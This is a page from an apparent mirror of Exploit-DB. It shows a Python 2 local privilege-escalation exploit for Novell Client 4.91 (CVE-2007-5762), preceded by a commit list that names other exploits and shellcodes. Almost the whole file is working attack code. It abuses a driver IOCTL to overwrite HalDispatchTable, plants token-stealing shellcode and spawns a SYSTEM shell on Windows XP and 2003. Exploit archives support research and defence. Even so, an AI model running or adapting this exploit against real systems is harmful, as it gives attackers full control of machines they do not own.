bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/18914.py
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

174 lines
No EOL
6.9 KiB
Python
Executable file
Raw Blame History

# Novell Client 4.91 SP3/4 Privilege escalation exploit
# Download link: http://download.novell.com/Download?buildid=SyZ1G2ti7wU~
#
# SecurityFocus: https://www.securityfocus.com/bid/27209/info
# CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5762
# Patch: http://download.novell.com/Download?buildid=4FmI89wOmg4~
#
# Author: sickness@offensive-security.com
# Version Tested: Novell Client 4.91 SP4
# Targets: Exploit works on all service packs of Win2K3 and WinXP (except Windows XP SP1)
# Thanks:
# - g0tmi1k for helping me test out the exploit on as many versions of Windows as possible.
# - ryujin for the help while developing the exploit.
from ctypes import *
import sys,struct,os
from optparse import OptionParser
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
def GetBase(drvname=None):
EVIL_ARRAY = 1024
myarray = c_ulong * EVIL_ARRAY
lpImageBase = myarray()
cb = c_int(1024)
lpcbNeeded = c_long()
drivername_size = c_long()
drivername_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
for baseaddr in lpImageBase:
drivername = c_char_p("\x00"*drivername_size.value)
if baseaddr:
Psapi.GetDeviceDriverBaseNameA(baseaddr, drivername,
drivername_size.value)
if drvname:
if drivername.value.lower() == drvname:
print "[>] Retrieving %s information." % drvname
print "[>] %s base address: %s" % (drvname, hex(baseaddr))
return baseaddr
else:
if drivername.value.lower().find("krnl") !=-1:
print "[>] Retrieving Kernel information."
print "[>] Kernel version: ", drivername.value
print "[>] Kernel base address: %s" % hex(baseaddr)
return (baseaddr, drivername.value)
return None
if __name__ == '__main__':
usage = "%prog -o <target>"
parser = OptionParser(usage=usage)
parser.add_option("-o", type="string",
action="store", dest="target_os",
help="Available target operating systems: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['XP','2K3']:
parser.print_help()
sys.exit()
OS = OS.upper()
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
DEVICE = '\\\\.\\nicm'
device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
(krnlbase, kernelver) = GetBase()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
HalBase = GetBase("hal.dll")
print "[>] HalDispatchTable address:", hex(HalDispatchTable)
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable0x4 + 0x4
HalDispatchTable_0x14 = HalDispatchTable0x4 - 0x10
if OS == "2K3":
HaliQuerySystemInformation = HalBase + 0x1fa1e # Offset for 2003
HalpSetSystemInformation = HalBase + 0x21c60 # Offset for 2003
else:
HaliQuerySystemInformation = HalBase + 0x16bba # Offset for XP
HalpSetSystemInformation = HalBase + 0x19436# Offset for XP
print "[>] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[>] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL
retn = c_ulong()
inut_buffer = HalDispatchTable0x4 - 0x10 + 0x3 # Make the pwnsauce overwrite
inut_size = 0x0
output_buffer = 0x41414141 # Junk
output_size = 0x0
# Get offsets
if OS == "2K3":
_KPROCESS = "\x38" # Offset for 2003
_TOKEN = "\xd8" # Offset for 2003
_UPID = "\x94" # Offset for 2003
_APLINKS = "\x98" # Offset for 2003
else:
_KPROCESS = "\x44" # Offset for XP
_TOKEN = "\xc8" # Offset for XP
_UPID = "\x84" # Offset for XP
_APLINKS = "\x88" # Offset for XP
# Restore the pointer
pointer_restore = "\x31\xc0" + \
"\xb8" + struct.pack("L", HalpSetSystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x8) + \
"\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x4)
# Make the evil token stealing
steal_token = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x89\x1d\x00\x09\x02\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
"\x75\xe8" +\
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
"\x8b\xc1" +\
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\
"\x5b" +\
"\x5a" +\
"\xc2\x10"
# Build the shellcode
sc = "\x90" * 100
sc+= pointer_restore + steal_token
sc+= "\x90" * 100
if OS == "2K3":
baseadd = c_int(0x02a6ba10)
else:
baseadd = c_int(0x026e7bb0)
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zero_Bits = c_int(0)
RegionSize = c_int(0x1000)
write = c_int(0)
dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)
if OS == "2K3":
kernel32.WriteProcessMemory(-1, 0x02a6ba10, sc, 0x1000, byref(write))
else:
kernel32.WriteProcessMemory(-1, 0x026e7bb0, sc, 0x1000, byref(write))
if device_handler:
print "[>] Sending IOCTL to the driver."
dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)
evil_in = c_ulong()
evil_out = c_ulong()
evil_in = 0x1337
hola = ntdll.NtQueryIntervalProfile(evil_in, byref(evil_out))
print "[>] Launching shell as SYSTEM."
os.system("cmd.exe /K cd c:\\windows\\system32")
Reference in a new issue View git blame Copy permalink